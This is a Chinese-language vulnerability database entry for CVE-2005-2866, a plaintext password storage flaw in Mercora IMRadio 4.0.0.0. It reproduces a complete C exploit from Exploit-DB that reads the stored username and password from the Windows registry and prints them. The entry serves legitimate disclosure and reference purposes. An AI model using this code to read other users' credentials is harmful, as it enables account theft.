CVE-2005-2866
CVSS4.6
发布时间 :2005-09-08 19:03:00
修订时间 :2008-09-05 16:52:52
NMCOE    

[原文]Mercora IMRadio 4.0.0.0 stores usernames and passwords in plaintext in the MercoraClient\Profiles registry key, which allows local users to gain privileges.


[CNNVD]Mercora IMRadio注册表键权限提升漏洞(CNNVD-200509-094)

        Mercora IMRadio 可以搜索、聆听和录制音乐。Mercora是一个用于人们、DJ和艺术家的合法音乐广播网络来源。该软件联合因特网数据流,指定国家拷贝权依据,依据社交网络技术。该软件支持活动音乐搜索功能。
        Mercora IMRadio 4.0.0.0版在注册表键值MercoraClient\Profiles 的明码文本中存储文件名和密码,允许本地用户获得权限。

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2866
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2866
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200509-094
(官方数据源) CNNVD

- 其它链接及资源

http://securitytracker.com/id?1014780
(VENDOR_ADVISORY)  SECTRACK  1014780

- 漏洞信息

Mercora IMRadio注册表键权限提升漏洞
中危 未知
2005-09-08 00:00:00 2005-10-20 00:00:00
本地  
        Mercora IMRadio 可以搜索、聆听和录制音乐。Mercora是一个用于人们、DJ和艺术家的合法音乐广播网络来源。该软件联合因特网数据流,指定国家拷贝权依据,依据社交网络技术。该软件支持活动音乐搜索功能。
        Mercora IMRadio 4.0.0.0版在注册表键值MercoraClient\Profiles 的明码文本中存储文件名和密码,允许本地用户获得权限。

- 公告与补丁

        

- 漏洞信息 (1173)

Mercora IMRadio <= 4.0.0.0 Local Password Disclosure Exploit (EDBID:1173)
windows local
2005-08-22 Verified
0 Kozan
N/A [点击下载]
/*================================================================

Mercora IMRadio 4.0.0.0 password disclosure local exploit by Kozan

Discovered & Coded by: Kozan
Credits to ATmaCA
Web: www.spyinstructors.com
Mail: kozan@netmagister.com

=====[ Application ]==============================================

Application: Mercora IMRadio 4.0.0.0 (and probably prior versions)
Vendor: www.mercora.com

=====[ Introduction ]=============================================

Search, listen, and record any music. With over 2.5 million unique
tracks, Mercora is a legal music radio network powered by people,
DJs, and artists just like you. Mercora combines Internet streaming,
country-specific copyright compliance, and social networking
technologies to create the next generation of digital music.
Version 4.0 supports friends and family listening, a vastly
simplified interface, customized listening, and live music search.

=====[ Bug ]======================================================

Mercora IMRadio 4.0.0.0 stores username and passwords in the Windows
Registry in plain text. A local user can read the values.

HKEY_CURRENT_USER\Software\Mercora\MercoraClient\Profiles
Auto.Username = Mercora IMRadio Username
Auto.Password = Mercora IMRadio Password

=====[ Vendor Confirmed ]=========================================

No

=====[ Fix ]======================================================

There is no solution at the time of this entry.

================================================================*/

#include <stdio.h>
#include <windows.h>
#define BUF 100

int main()
{
       HKEY hKey;
       char Username[BUF], Password[BUF];
       DWORD dwBUFLEN = BUF;
       LONG lRet;

       if( RegOpenKeyEx(HKEY_CURRENT_USER,
                                       "Software\\Mercora\\MercoraClient\\Profiles",
                                       0,
                                       KEY_QUERY_VALUE,
                                       &hKey
                                       ) == ERROR_SUCCESS )
       {
               lRet = RegQueryValueEx(hKey, "Auto.Password", NULL, NULL, (LPBYTE)Password, &dwBUFLEN);
               if (lRet != ERROR_SUCCESS || dwBUFLEN > BUF) strcpy(Password,"Not Found!");

               lRet = RegQueryValueEx(hKey, "Auto.Username", NULL, NULL, (LPBYTE)Username, &dwBUFLEN);
               if (lRet != ERROR_SUCCESS || dwBUFLEN > BUF) strcpy(Username,"Not Found!");

               RegCloseKey(hKey);

               fprintf(stdout, "Mercora IMRadio 4.0.0.0 password disclosure local exploit by Kozan\n");
               fprintf(stdout, "Credits to ATmaCA\n");
               fprintf(stdout, "www.spyinstructors.com \n");
               fprintf(stdout, "kozan@spyinstructors.com\n\n");
               fprintf(stdout, "Username :\t%s\n",Username);
               fprintf(stdout, "Password :\t%s\n",Password);
       }
       else
       {
               fprintf(stderr, "Mercora IMRadio 4.0.0.0 is not installed on your system!\n");
       }

       return 0;
}

// milw0rm.com [2005-08-22]
		

- 漏洞信息

19087
Mercora IMRadio Registry Cleartext Password Storage
Cryptographic, Information Disclosure
Loss of Confidentiality
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-08-23 Unknow
2005-08-23 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站